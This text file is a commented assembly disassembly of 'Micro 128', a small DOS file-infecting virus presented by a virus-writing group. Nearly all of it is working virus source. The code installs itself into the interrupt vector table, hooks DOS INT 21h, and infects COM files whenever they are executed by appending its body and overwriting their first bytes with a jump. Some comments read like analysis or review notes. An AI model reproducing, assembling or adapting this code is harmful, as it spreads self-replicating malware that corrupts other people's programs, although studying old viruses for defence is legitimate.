Text File  |  1995-02-06  |  4.4 KB  |  104 lines

  1.  
  2. ;                             Darkman/VLAD
  3. ;                           Proudly Presents
  4. ;                       Disassembly of Micro 128
  5.  
  6.  
  7. micro128     segment
  8.              assume  cs:micro128,ds:micro128,es:micro128
  9.              org     100h                ; COM image is loaded at offset 100h
  10. ; Entry stub: restores the host's first 3 bytes, copies the body to 0000:0303h, hooks INT 21h, runs the host
  11. code:
  12. jumpcode     db      0e9h,03h,00h        ; E9 03 00 = near jump over the 3 saved bytes below
  13. viruscode:
  14. realcode     db      0cdh,20h,90h        ; Host's original first 3 bytes (here INT 20h, NOP)
  15. ; Layout: realcode in the file corresponds to 0000:0300h in the resident copy; the copied code starts 3 bytes later
  16.              lea     di,code             ; DI = 100h, start of the COM image
  17.              push    di                  ; Pushed as the address the final RET returns to
  18.              mov     si,di               ; SI = 100h as well
  19.              add     si,[di+01h]         ; SI = 100h + jump displacement = address of realcode
  20.              movsw                       ; Restore the host's first 3 bytes at 100h
  21.              movsb                       ;  (SI now points just past realcode, DI = 103h)
  22.              xor     ax,ax               ; AX = 0
  23.              mov     es,ax               ; ES = 0000h, the segment holding the interrupt vector table
  24.              mov     di,303h             ; DI = 0303h, inside the vector table (entries C0h-DFh)
  25.              mov     cl,7dh              ; Count = 7Dh (125) bytes; assumes CH = 0 on entry
  26.              rep     movsb               ; Copy the code after realcode to 0000:0303h
  27.              scasw                       ; Compare AX (0) with the word at ES:DI (0380h if CX was 7Dh = INT E0h vector)
  28.              jne     virusexit           ; Non-zero there (presumably resident already or vector in use): skip the hook
  29.              std                         ; STOSW below steps DI downwards
  30. setintvec:
  31.              xchg    ax,es:[di+0fd04h]   ; Swap AX with an INT 21h vector word (address wraps: pass 1 = 0086h, pass 2 = 0084h)
  32.              stosw                       ; Keep the old INT 21h word in the INT E0h vector (0382h, then 0380h)
  33.              mov     ax,033fh            ; AX = 033Fh, offset of virusint21 in the resident copy
  34.              cmc                         ; Toggle CF so the loop body runs exactly twice
  35.              jb      setintvec           ; CF set after the first pass: go patch the offset word
  36.              cld                         ; Clear direction flag
  37. virusexit:
  38.              push    cs                  ; Save CS at stack
  39.              pop     es                  ; ES = CS again (undoes ES = 0 from above)
  40.              ret                         ; Return to 100h (pushed above) and run the host
  41. mvfptrbegin:
  42.              mov     al,00h              ; AL = 0: seek relative to the start of the file
  43. movefileptr:
  44.              mov     ah,42h              ; AH = 42h: DOS move file pointer, origin taken from AL
  45.              xor     cx,cx               ; CX:DX = 0 ...
  46.              xor     dx,dx               ;  ... so the pointer lands exactly on the origin
  47.              int     0e0h                ; Call the saved original INT 21h through vector E0h
  48. ; Preset CX and DX for the caller's next read/write: 3 bytes at offset 0300h
  49.              mov     cl,03h              ; CX = 3 (CH is 0 from the XOR above)
  50.              mov     dh,03h              ; DX = 0300h, assuming the seek returned DX = 0 (file below 64K)
  51.              ret                         ; Return!
  52.  
  53. micro128cod  db      0e9h,?,?            ; 3-byte near jump written over the target's start; displacement patched below
  54. virusint21:
  55.              cmp     ah,4bh              ; INT 21h function 4Bh (load or execute)?
  56.              jne     int21exit           ; Anything else goes straight to the original handler
  57.  
  58.              push    ax                  ; Save AX at stack
  59.              push    bx                  ; Save BX at stack
  60.              push    dx                  ; Save DX at stack
  61.              push    ds                  ; Save DS at stack
  62.  
  63.              mov     ax,3d02h            ; Open file (read/write); DS:DX is still the caller's 4Bh path argument
  64.              int     0e0h                ; Original INT 21h via vector E0h
  65.              jb      closefile           ; CF set = open failed (NOTE: BX is not a file handle on this path)
  66.              mov     bx,ax               ; BX = file handle
  67.  
  68.              push    cs                  ; Save CS at stack
  69.              pop     ds                  ; DS = CS (segment of the resident copy)
  70.              call    mvfptrbegin         ; Seek to start of file; presets CX = 3, DX = 0300h
  71.  
  72.              mov     ah,3fh              ; Read 3 bytes from the file to DS:0300h
  73.              int     0e0h                ; Do it!
  74.              cmp     byte ptr ds:[300h],'M' ; First byte 'M' (as in an EXE "MZ" header)?
  75.              je      closefile           ; Yes: leave the file untouched
  76. ; NOTE(review): no other test is visible here, so a previously modified file is not recognised
  77.              dec     ax                  ; AX = bytes read - 1, i.e. AL = 2 (seek from end) after a full 3-byte read
  78.              call    movefileptr         ; Seek to end of file; AX = low word of the file length
  79.              mov     ds:[33dh],ax        ; Patch the displacement of micro128cod (033Ch) with the file length
  80.  
  81.              mov     ah,40h              ; Write to file
  82.              mov     cl,(codeend-viruscode) ; Length of the body, including the 3 saved bytes at 0300h
  83.              int     0e0h                ; Append the body at the end of the file
  84.  
  85.              call    mvfptrbegin         ; Back to the start of the file; CX = 3 again
  86.  
  87.              mov     dl,3ch              ; DX = 033Ch = offset of micro128cod
  88.              mov     ah,40h              ; Write to file
  89.              int     0e0h                ; Overwrite the first 3 bytes with the patched jump
  90. closefile:
  91.              mov     ah,3eh              ; Close file
  92.              int     0e0h                ; Do it!
  93.  
  94.              pop     ds                  ; Load DS from stack
  95.              pop     dx                  ; Load DX from stack
  96.              pop     bx                  ; Load BX from stack
  97.              pop     ax                  ; Load AX from stack
  98. int21exit:
  99. jumpfar      db      0eah                ; Opcode of JMP FAR; operand = the 4 bytes after codeend in the resident copy (INT E0h vector if the body is 80h bytes - TODO confirm)
  100. codeend:
  101. ; Analyst note: while resident, INT 21h points to 0000:033Fh (inside the vector table) and INT E0h holds the previous INT 21h address
  102. micro128     ends
  103. end          code
  104.